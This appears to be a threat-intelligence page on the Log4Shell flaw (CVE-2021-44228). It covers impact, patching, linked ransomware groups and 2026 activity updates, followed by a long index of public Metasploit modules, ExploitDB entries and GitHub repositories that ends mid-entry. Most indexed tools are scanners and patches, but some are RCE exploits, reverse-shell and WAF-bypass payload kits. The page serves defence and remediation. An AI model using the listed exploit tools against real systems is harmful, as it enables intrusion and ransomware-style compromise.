CVE-2021-44228
Overview
This vulnerability is a remote code execution flaw caused by improper input validation in the JNDI lookup mechanism of Apache Log4j2's log message substitution feature. The root cause lies in the log4j-core component's failure to restrict attacker-controlled LDAP and other JNDI endpoints, allowing untrusted data to trigger JNDI lookups. This affects versions 2.0-beta9 through 2.15.0, excluding certain security releases, where message lookup substitution is enabled by default.
Vulnerability Description
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Impact
An unauthenticated attacker can execute arbitrary code on affected systems by injecting malicious JNDI lookup strings into log messages or parameters, leading to full system compromise. No user interaction or credentials are required, enabling remote code execution through network requests. This can result in data breaches, lateral movement within networks, and disruption of critical services relying on vulnerable Log4j2 instances.
Solution
Apply vendor-recommended patches by upgrading Apache Log4j2 to version 2.16.0 or later, where vulnerable JNDI functionality is removed. For affected Debian systems, refer to Debian Security Advisory DSA-5020. Cisco and Microsoft have issued advisories with patch guidance accessible via their security centers. Detailed remediation instructions and version-specific fixes are available at the Apache Log4j2 security page (https://logging.apache.org/log4j/2.x/security.html).
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
lockbit
|
5 | correlation_misp |
|
lockbit
|
5 | ransomware.live |
|
nightsky
|
2 | ransomware.live |
|
lockbit black
|
— | correlation_misp |
|
lockbit green
|
— | correlation_misp |
|
lockbit 30
|
— | correlation_misp |
|
lockbit 20
|
— | correlation_misp |
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Magic Hound
|
MEDIUM | — | correlation_mitre |
|
Iranian IRGC Data Extortion Operations
|
MEDIUM | — | correlation_misp |
|
Sea Turtle
|
MEDIUM | — | correlation_mitre |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Apache Log4j2 arises from its handling of Java Naming and Directory Interface (JNDI) features, which are used for configuration, log messages, and parameters. Specifically, the flaw allows an attacker to manipulate log messages or parameters to execute arbitrary code via remote servers, such as LDAP. This occurs when message lookup substitution is enabled, which is a default behavior in versions prior to 2.15.0. The implications of this vulnerability are severe, as it can lead to remote code execution, allowing attackers to gain control over affected systems and potentially escalate privileges or exfiltrate sensitive data.
Attack vectors exploiting this vulnerability are diverse and can be executed through various means. For instance, an attacker could send a specially crafted log message containing malicious payloads to an application that utilizes Log4j2 for logging. If the application processes this input without proper validation, it can trigger the JNDI lookup, leading to the execution of the attacker's code. This scenario can occur in web applications, microservices, or any software component that logs user input or system events. Furthermore, the ease of exploitation, combined with the widespread use of Log4j2 across numerous applications and services, amplifies the risk, making it a prime target for attackers.
The real-world impact of this vulnerability is profound. Organizations relying on affected versions of Log4j2 face significant business risks, including data breaches, service disruptions, and reputational damage. The potential for widespread exploitation means that attackers could leverage this vulnerability to launch coordinated attacks, affecting not only individual organizations but also entire sectors. For instance, critical infrastructure and cloud services that utilize vulnerable versions could be compromised, leading to cascading failures and significant economic repercussions. The urgency to address this vulnerability was underscored by the rapid development of exploit tools and the high-profile nature of incidents that followed its disclosure.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to identify all instances of Log4j2 in use within the organization, including third-party applications that may bundle the library. Regular vulnerability scanning and code reviews can help in identifying affected versions. Once identified, organizations should prioritize upgrading to the latest versions that have disabled the vulnerable behavior by default or removed it entirely. In addition to patching, organizations should implement robust logging and monitoring solutions to detect unusual activity that may indicate exploitation attempts. Network segmentation and strict access controls can further reduce the attack surface, limiting the potential impact of any successful exploitation.
In conclusion, the vulnerability in Apache Log4j2 represents a critical security risk that necessitates immediate attention from organizations leveraging this logging framework. The technical details highlight the ease of exploitation, while the potential real-world impact underscores the urgency for remediation. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this and similar vulnerabilities, thereby enhancing their overall security posture in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-44228, accompanied by the emergence of new proof-of-concept tools that streamline vulnerability scanning and exploitation. This subtle uptick in activity, while not yet a marked escalation, indicates sustained adversary interest and ongoing refinement of attack methodologies. Notably, ransomware groups associated with this vulnerability continue to leverage these developments, reinforcing the persistent threat posed by Log4Shell exploitation. Although the overall exploit trend remains stable, the availability of more accessible and automated exploitation frameworks lowers the barrier for threat actors, potentially broadening the attacker base. Consequently, the risk level remains critical, underscoring the necessity for continued vigilance as adversaries adapt and expand their operational capabilities.
Update 2 — May 15, 2026
CSURFACE threat intelligence has identified a modest but consistent increase in exploitation attempts targeting CVE-2021-44228, accompanied by the emergence of new ransomware actors leveraging this vulnerability. Our telemetry indicates that while overall exploitation activity remains relatively stable, the introduction of additional automated tools and proof-of-concept exploits has lowered the technical barrier for adversaries. This expansion in the exploit toolkit facilitates broader access for less sophisticated threat actors, thereby increasing the potential attack surface. Notably, the ransomware landscape associated with this vulnerability has diversified, with an additional group now confirmed to be actively exploiting Log4Shell, signaling evolving tactics and sustained interest in leveraging this critical flaw. These developments underscore a persistent and adaptive threat environment where the risk of successful compromise remains elevated. Consequently, the threat level for CVE-2021-44228 continues to be assessed as critical, reflecting both the ongoing exploitation momentum and the widening range of adversaries capitalizing on this vulnerability.
Update 3 — May 23, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-44228, accompanied by the emergence of new proof-of-concept tools that demonstrate expanded attack vectors and enhanced exploitation techniques. This subtle uptick in activity, while not yet rapid or widespread, signals continued adversary interest and innovation in leveraging Log4Shell vulnerabilities. Additionally, the ransomware ecosystem exploiting this flaw has further diversified, with multiple LockBit variants maintaining active campaigns, underscoring the vulnerability’s persistent appeal to financially motivated threat actors. The incremental rise in the EPSS score corroborates this trend, reflecting a marginally heightened likelihood of exploitation in the near term. For defenders, these developments emphasize the necessity of sustained vigilance and monitoring, as the evolving exploit landscape may enable more sophisticated or targeted attacks. Consequently, the overall threat level remains critical, with the risk environment characterized by steady exploitation momentum and an expanding array of adversaries refining their operational tactics.
Update 4 — July 04, 2026
CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting CVE-2021-44228, reflecting a persistent and expanding adversary interest. Our telemetry indicates that threat actors, including ransomware groups such as LockBit variants and NightSky, continue to leverage this vulnerability as a reliable vector for initial access and payload deployment. While the EPSS score remains near its peak, the slight increase in detection activity underscores ongoing exploitation momentum rather than a new wave of attacks. Concurrently, the emergence of additional proof-of-concept tools and scanning utilities in open repositories suggests adversaries are refining their operational capabilities to automate and scale attacks. This sustained activity, coupled with high-confidence ransomware associations, reinforces the critical threat level. Defenders should interpret these developments as confirmation that CVE-2021-44228 remains a favored target within financially motivated campaigns, necessitating continued vigilance despite the vulnerability’s age.
Affected Products (373)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Siemens | 6bk1602-0aa12-0tp0 Firmware | All |
cpe:2.3:o:siemens:6bk1602-0aa12-0tp0_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | 6bk1602-0aa22-0tp0 Firmware | All |
cpe:2.3:o:siemens:6bk1602-0aa22-0tp0_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | 6bk1602-0aa32-0tp0 Firmware | All |
cpe:2.3:o:siemens:6bk1602-0aa32-0tp0_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | 6bk1602-0aa42-0tp0 Firmware | All |
cpe:2.3:o:siemens:6bk1602-0aa42-0tp0_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | 6bk1602-0aa52-0tp0 Firmware | All |
cpe:2.3:o:siemens:6bk1602-0aa52-0tp0_firmware:*:*:*:*:*:*:*:*
|
|
|
Apache | Log4j | All |
cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
|
|
|
Apache | Log4j | All |
cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
|
|
|
Apache | Log4j | All |
cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*
|
|
|
Apache | Log4j | 2.0 |
cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*
|
|
|
Apache | Log4j | 2.0 |
cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*
|
|
|
Apache | Log4j | 2.0 |
cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*
|
|
|
Apache | Log4j | 2.0 |
cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*
|
|
|
Siemens | Sppa-T3000 Ses3000 Firmware | All |
cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*
|
|
|
Siemens | Capital | All |
cpe:2.3:a:siemens:capital:*:*:*:*:*:*:*:*
|
|
|
Siemens | Capital | 2019.1 |
cpe:2.3:a:siemens:capital:2019.1:-:*:*:*:*:*:*
|
|
|
Siemens | Capital | 2019.1 |
cpe:2.3:a:siemens:capital:2019.1:sp1912:*:*:*:*:*:*
|
|
|
Siemens | Comos | All |
cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*
|
|
|
Siemens | Desigo Cc Advanced Reports | 3.0 |
cpe:2.3:a:siemens:desigo_cc_advanced_reports:3.0:*:*:*:*:*:*:*
|
|
|
Siemens | Desigo Cc Advanced Reports | 4.0 |
cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*
|
|
|
Siemens | Desigo Cc Advanced Reports | 4.1 |
cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (5)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)
exploits/multi/http/ubiquiti_unifi_log4shell
|
Spencer McIntyre | Unknown | - | View |
|
Log4Shell HTTP Scanner
auxiliary/scanner/http/log4shell_scanner
|
Spencer McIntyre | Unknown | - | View |
|
VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)
exploits/multi/http/vmware_vcenter_log4shell
|
Spencer McIntyre | Unknown | - | View |
|
MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
exploits/linux/http/mobileiron_core_log4shell
|
Spencer McIntyre | Unknown | - | View |
|
Log4Shell HTTP Header Injection
exploits/multi/http/log4shell_header_injection
|
Michael Schierl, juan vazquez, sinn3r +1 | Unknown | - | View |
ExploitDB (3)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| AD Manager Plus 7122 - Remote Code Execution (RCE) | Chan Nyein Wai | remote | java | - | View |
| Apache Log4j 2 - Remote Code Execution (RCE) | kozmer | remote | java | - | View |
| Apache Log4j2 2.14.1 - Information Disclosure | leonjza | remote | java | - | View |
GitHub PoCs (424)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
fullhunt/log4j-scan
A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228
|
fullhunt | 3425 | 726 | 2021-12-13 | View |
|
kozmer/log4j-shell-poc
A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
|
kozmer | 1848 | 543 | 2021-12-10 | View |
|
christophetd/log4shell-vulnerable-app
Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228).
|
christophetd | 1140 | 554 | 2021-12-10 | View |
|
Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
🐱💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
|
Puliczek | 950 | 135 | 2021-12-10 | View |
|
logpresso/CVE-2021-44228-Scanner
Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228
|
logpresso | 862 | 169 | 2021-12-11 | View |
|
f0ng/log4j2burpscanner
CVE-2021-44228 Log4j2 BurpSuite Scanner,Customize ceye.io api or other apis,including internal networks
|
f0ng | 841 | 107 | 2021-12-11 | View |
|
mergebase/log4j-detector
A public open sourced tool. Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) ...
|
mergebase | 640 | 96 | 2021-12-12 | View |
|
jas502n/Log4j2-CVE-2021-44228
Remote Code Injection In Log4j
|
jas502n | 469 | 119 | 2021-12-10 | View |
|
corretto/hotpatch-for-apache-log4j2
An agent to hotpatch the log4j RCE from CVE-2021-44228.
|
corretto | 497 | 72 | 2021-12-12 | View |
|
fox-it/log4j-finder
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228, CVE-2021-45046, CV...
|
fox-it | 439 | 97 | 2021-12-14 | View |
|
0xInfection/LogMePwn
A fully automated, reliable, super-fast, scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability.
|
0xInfection | 395 | 56 | 2021-12-14 | View |
|
CERTCC/CVE-2021-44228_scanner
Scanners for Jar files that may be vulnerable to CVE-2021-44228
|
CERTCC | 350 | 85 | 2021-12-14 | View |
|
Diverto/nse-log4shell
Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228)
|
Diverto | 352 | 47 | 2021-12-12 | View |
|
rubo77/log4j_checker_beta
a fast check, if your server could be vulnerable to CVE-2021-44228
|
rubo77 | 247 | 84 | 2021-12-13 | View |
|
back2root/log4shell-rex
PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs
|
back2root | 292 | 30 | 2021-12-13 | View |
|
takito1812/log4j-detect
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multith...
|
takito1812 | 195 | 55 | 2021-12-10 | View |
|
NS-Sp4ce/Vm4J
A tool for detect&exploit vmware product log4j(cve-2021-44228) vulnerability.Support VMware HCX/vCenter/NSX/Horizon/vRea...
|
NS-Sp4ce | 209 | 39 | 2021-12-28 | View |
|
HyCraftHD/Log4J-RCE-Proof-Of-Concept
Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information
|
HyCraftHD | 182 | 31 | 2021-12-10 | View |
|
alexandre-lavoie/python-log4rce
An All-In-One Pure Python PoC for CVE-2021-44228
|
alexandre-lavoie | 178 | 29 | 2021-12-12 | View |
|
puzzlepeaches/Log4jUnifi
Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more.
|
puzzlepeaches | 168 | 31 | 2021-12-24 | View |
|
mubix/CVE-2021-44228-Log4Shell-Hashes
Hashes for vulnerable LOG4J versions
|
mubix | 155 | 36 | 2021-12-10 | View |
|
BinaryDefense/log4j-honeypot-flask
Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228
|
BinaryDefense | 149 | 25 | 2021-12-14 | View |
|
NorthwaveSecurity/log4jcheck
A script that checks for vulnerable Log4j (CVE-2021-44228) systems using injection of the payload in common HTTP headers...
|
NorthwaveSecurity | 126 | 24 | 2021-12-10 | View |
|
boundaryx/cloudrasp-log4j2
一个针对防御 log4j2 CVE-2021-44228 漏洞的 RASP 工具。 A Runtime Application Self-Protection module specifically designed for log4j2 ...
|
boundaryx | 125 | 20 | 2021-12-10 | View |
|
Adikso/minecraft-log4j-honeypot
Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam
|
Adikso | 107 | 20 | 2021-12-10 | View |
|
0xDexter0us/Log4J-Scanner
Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth.
|
0xDexter0us | 102 | 24 | 2021-12-13 | View |
|
puzzlepeaches/Log4jCenter
Exploiting CVE-2021-44228 in vCenter for remote code execution and more.
|
puzzlepeaches | 106 | 19 | 2021-12-19 | View |
|
thomaspatzke/Log4Pot
A honeypot for the Log4Shell vulnerability (CVE-2021-44228).
|
thomaspatzke | 94 | 30 | 2021-12-15 | View |
|
tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
Apache Log4j 远程代码执行
|
tangxiaofeng7 | 90 | 30 | 2021-12-09 | View |
|
simonis/Log4jPatch
Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process
|
simonis | 108 | 11 | 2021-12-10 | View |
|
MalwareTech/Log4jTools
Tools for investigating Log4j CVE-2021-44228
|
MalwareTech | 94 | 12 | 2021-12-14 | View |
|
cyberxml/log4j-poc
A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell
|
cyberxml | 72 | 33 | 2021-12-12 | View |
|
alexbakker/log4shell-tools
Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-...
|
alexbakker | 86 | 15 | 2021-12-13 | View |
|
giterlizzi/nmap-log4shell
Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)
|
giterlizzi | 79 | 20 | 2021-12-13 | View |
|
nccgroup/log4j-jndi-be-gone
A Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x "JNDI LDAP" vulnerability.
|
nccgroup | 72 | 16 | 2021-12-12 | View |
|
bigsizeme/Log4j-check
log4J burp被扫插件、CVE-2021-44228、支持dnclog.cn和burp内置DNS、可配合JNDIExploit生成payload
|
bigsizeme | 70 | 16 | 2021-12-13 | View |
|
LiveOverflow/log4shell
Small example repo for looking into log4j CVE-2021-44228
|
LiveOverflow | 72 | 11 | 2021-12-15 | View |
|
future-client/CVE-2021-44228
Abuse Log4J CVE-2021-44228 to patch CVE-2021-44228 in vulnerable Minecraft game sessions to prevent exploitation in the ...
|
future-client | 66 | 3 | 2021-12-12 | View |
|
Jeromeyoung/log4j2burpscanner
CVE-2021-44228,log4j2 burp插件 Java版本,dnslog选取了非dnslog.cn域名
|
Jeromeyoung | 32 | 37 | 2021-12-12 | View |
|
lucab85/log4j-cve-2021-44228
Ansible detector scanner playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-202...
|
lucab85 | 57 | 10 | 2021-12-21 | View |
|
authomize/log4j-log4shell-affected
Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE). This list is mean...
|
authomize | 52 | 8 | 2021-12-12 | View |
|
CodeShield-Security/Log4JShell-Bytecode-Detector
Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)
|
CodeShield-Security | 49 | 9 | 2021-12-12 | View |
|
CreeperHost/Log4jPatcher
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnera...
|
CreeperHost | 49 | 6 | 2021-12-10 | View |
|
dtact/divd-2021-00038--log4j-scanner
Scan systems and docker images for potential log4j vulnerabilities. Able to patch (remove JndiLookup.class) from layered...
|
dtact | 46 | 9 | 2021-12-12 | View |
|
redhuntlabs/Log4JHunt
An automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability.
|
redhuntlabs | 47 | 8 | 2021-12-15 | View |
|
1lann/log4shelldetect
Rapidly scan filesystems for Java programs potentially vulnerable to Log4Shell (CVE-2021-44228) or "that Log4j JNDI expl...
|
1lann | 45 | 8 | 2021-12-11 | View |
|
HynekPetrak/log4shell-finder
Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-...
|
HynekPetrak | 39 | 13 | 2021-12-14 | View |
|
RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs
|
RedDrip7 | 44 | 7 | 2021-12-12 | View |
|
hackinghippo/log4shell_ioc_ips
log4j / log4shell IoCs from multiple sources put together in one big file (IPs) more coming soon (CVE-2021-44228)
|
hackinghippo | 37 | 12 | 2021-12-13 | View |
|
stripe/log4j-remediation-tools
Tools for remediating the recent log4j2 RCE vulnerability (CVE-2021-44228)
|
stripe | 40 | 7 | 2021-12-14 | View |
|
twseptian/spring-boot-log4j-cve-2021-44228-docker-lab
Spring Boot Log4j - CVE-2021-44228 Docker Lab
|
twseptian | 27 | 20 | 2021-12-12 | View |
|
infiniroot/nginx-mitigate-log4shell
Mitigate log4shell (CVE-2021-44228) vulnerability attacks using Nginx LUA script
|
infiniroot | 38 | 6 | 2021-12-12 | View |
|
Y0-kan/Log4jShell-Scan
log4j2 RCE漏洞(CVE-2021-44228)内网扫描器,可用于在不出网的条件下进行漏洞扫描,帮助企业内部快速发现Log4jShell漏洞。
|
Y0-kan | 38 | 6 | 2021-12-20 | View |
|
fireeye/CVE-2021-44228
OpenIOC rules to facilitate hunting for indicators of compromise
|
fireeye | 37 | 6 | 2021-12-13 | View |
|
darkarnium/Log4j-CVE-Detect
Detections for CVE-2021-44228 inside of nested binaries
|
darkarnium | 35 | 7 | 2021-12-11 | View |
|
greymd/CVE-2021-44228
Vulnerability CVE-2021-44228 checker
|
greymd | 35 | 4 | 2021-12-10 | View |
|
sassoftware/loguccino
Scan and patch tool for CVE-2021-44228 and related log4j concerns.
|
sassoftware | 33 | 5 | 2021-12-21 | View |
|
toramanemre/log4j-rce-detect-waf-bypass
A Nuclei Template for Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass Payloads
|
toramanemre | 23 | 9 | 2021-12-11 | View |
|
qingtengyun/cve-2021-44228-qingteng-online-patch
Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.
|
qingtengyun | 25 | 4 | 2021-12-12 | View |
|
corelight/cve-2021-44228
Log4j Exploit Detection Logic for Zeek
|
corelight | 19 | 9 | 2021-12-13 | View |
|
r3kind1e/Log4Shell-obfuscated-payloads-generator
Generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection.
|
r3kind1e | 25 | 2 | 2022-05-09 | View |
|
mufeedvh/log4jail
A firewall reverse proxy for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.
|
mufeedvh | 23 | 4 | 2021-12-14 | View |
|
pedrohavay/exploit-CVE-2021-44228
This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228).
|
pedrohavay | 20 | 3 | 2021-12-13 | View |
|
blake-fm/vcenter-log4j
Script to apply official workaround for VMware vCenter log4j vulnerability CVE-2021-44228
|
blake-fm | 17 | 6 | 2021-12-12 | View |
|
faisalfs10x/Log4j2-CVE-2021-44228-revshell
Log4j2 CVE-2021-44228 revshell, ofc it suck!!
|
faisalfs10x | 18 | 2 | 2021-12-14 | View |
|
Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228
IP addresses exploiting recent log4j2 vulnerability CVE-2021-44228
|
Malwar3Ninja | 16 | 3 | 2021-12-12 | View |
|
aws-samples/kubernetes-log4j-cve-2021-44228-node-agent
|
aws-samples | 2 | 17 | 2021-12-15 | View |
|
Glease/Healer
Patch up CVE-2021-44228 for minecraft forge 1.7.10 - 1.12.2
|
Glease | 19 | 0 | 2021-12-09 | View |
|
lhotari/log4shell-mitigation-tester
Log4Shell CVE-2021-44228 mitigation tester
|
lhotari | 16 | 1 | 2021-12-11 | View |
|
ab0x90/CVE-2021-44228_PoC
|
ab0x90 | 16 | 1 | 2021-12-14 | View |
|
roxas-tan/CVE-2021-44228
This Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
|
roxas-tan | 10 | 7 | 2021-12-16 | View |
|
xsultan/log4jshield
Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher
|
xsultan | 13 | 3 | 2021-12-14 | View |
|
thecyberneh/Log4j-RCE-Exploiter
Scanner for Log4j RCE CVE-2021-44228
|
thecyberneh | 11 | 5 | 2021-12-13 | View |
|
claranet/ansible-role-log4shell
Find Log4Shell CVE-2021-44228 on your system
|
claranet | 11 | 5 | 2021-12-13 | View |
|
mitiga/log4shell-cloud-scanner
we are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulner...
|
mitiga | 14 | 1 | 2021-12-15 | View |
|
ossie-git/log4shell_sentinel
A Smart Log4Shell/Log4j/CVE-2021-44228 Scanner
|
ossie-git | 14 | 1 | 2021-12-22 | View |
|
zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service
|
zsolt-halo | 13 | 2 | 2021-12-13 | View |
|
snow0715/log4j-Scan-Burpsuite
Log4j漏洞(CVE-2021-44228)的Burpsuite检测插件
|
snow0715 | 13 | 2 | 2021-12-16 | View |
|
Hydragyrum/evil-rmi-server
An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228
|
Hydragyrum | 12 | 3 | 2021-12-12 | View |
|
rakutentech/jndi-ldap-test-server
A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2...
|
rakutentech | 11 | 4 | 2021-12-11 | View |
|
kubearmor/log4j-CVE-2021-44228
Apache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228
|
kubearmor | 9 | 6 | 2021-12-15 | View |
|
CrackerCat/CVE-2021-44228-Log4j-Payloads
|
CrackerCat | 3 | 12 | 2021-12-15 | View |
|
Nanitor/log4fix
Detect and fix log4j log4shell vulnerability (CVE-2021-44228)
|
Nanitor | 12 | 2 | 2021-12-16 | View |
|
marcourbano/CVE-2021-44228
PoC for CVE-2021-44228.
|
marcourbano | 7 | 7 | 2021-12-24 | View |
|
sunnyvale-it/CVE-2021-44228-PoC
CVE-2021-44228 (Log4Shell) Proof of Concept
|
sunnyvale-it | 8 | 5 | 2021-12-12 | View |
|
ssl/scan4log4j
Python script that sends CVE-2021-44228 log4j payload requests to url list
|
ssl | 6 | 7 | 2021-12-12 | View |
|
wortell/log4j
Repo containing all info, scripts, etc. related to CVE-2021-44228
|
wortell | 9 | 3 | 2021-12-14 | View |
|
Labout/log4shell-rmi-poc
A Proof of Concept of the Log4j vulnerabilities (CVE-2021-44228) over Java-RMI
|
Labout | 8 | 4 | 2021-12-19 | View |
|
momos1337/Log4j-RCE
Log4j RCE - (CVE-2021-44228)
|
momos1337 | 7 | 5 | 2021-12-12 | View |
|
qingtengyun/cve-2021-44228-qingteng-patch
|
qingtengyun | 9 | 2 | 2021-12-12 | View |
|
immunityinc/Log4j-JNDIServer
This project will help to test the Log4j CVE-2021-44228 vulnerability.
|
immunityinc | 9 | 2 | 2021-12-17 | View |
|
lfama/log4j_checker
Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.
|
lfama | 8 | 3 | 2021-12-13 | View |
|
Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs
Public IoCs about log4j CVE-2021-44228
|
Sh0ckFR | 9 | 1 | 2021-12-11 | View |
|
obscuritylabs/log4shell-poc-lab
A lab demonstration of the log4shell vulnerability: CVE-2021-44228
|
obscuritylabs | 9 | 1 | 2021-12-17 | View |
|
Tai-e/CVE-2021-44228
Utilize Tai-e to identify the Log4shell (a.k.a. CVE-2021-44228) Vulnerability
|
Tai-e | 9 | 1 | 2023-10-06 | View |
|
atnetws/fail2ban-log4j
fail2ban filter that catches attacks againts log4j CVE-2021-44228
|
atnetws | 8 | 2 | 2021-12-13 | View |
|
cybersecurityworks553/log4j-shell-csw
A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability.
|
cybersecurityworks553 | 8 | 2 | 2021-12-24 | View |
|
TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit
open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability
|
TaroballzChen | 7 | 3 | 2021-12-23 | View |
|
justakazh/Log4j-CVE-2021-44228
Mass Check Vulnerable Log4j CVE-2021-44228
|
justakazh | 6 | 4 | 2021-12-13 | View |
|
AlexandreHeroux/Fix-CVE-2021-44228
Apply class remove process from ear/war/jar/zip archive, see https://logging.apache.org/log4j/2.x/
|
AlexandreHeroux | 6 | 4 | 2021-12-13 | View |
|
KosmX/CVE-2021-44228-example
vulnerability POC
|
KosmX | 7 | 2 | 2021-12-10 | View |
|
Azeemering/CVE-2021-44228-DFIR-Notes
CVE-2021-44228 DFIR Notes
|
Azeemering | 7 | 2 | 2021-12-10 | View |
|
DragonSurvivalEU/RCE
CVE-2021-44228 fix
|
DragonSurvivalEU | 6 | 3 | 2021-12-10 | View |
|
irgoncalves/f5-waf-enforce-sig-CVE-2021-44228
This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device
|
irgoncalves | 6 | 3 | 2021-12-11 | View |
|
DXC-StrikeForce/Burp-Log4j-HammerTime
Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046
|
DXC-StrikeForce | 8 | 0 | 2021-12-16 | View |
|
OopsieWoopsie/mc-log4j-patcher
CVE-2021-44228 server-side fix for minecraft servers.
|
OopsieWoopsie | 7 | 1 | 2021-12-10 | View |
|
mschmnet/Log4Shell-demo
Demo to show how Log4Shell / CVE-2021-44228 vulnerability works
|
mschmnet | 7 | 1 | 2021-12-19 | View |
|
isuruwa/Log4j
A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228
|
isuruwa | 6 | 2 | 2021-12-15 | View |
|
demining/Log4j-Vulnerability
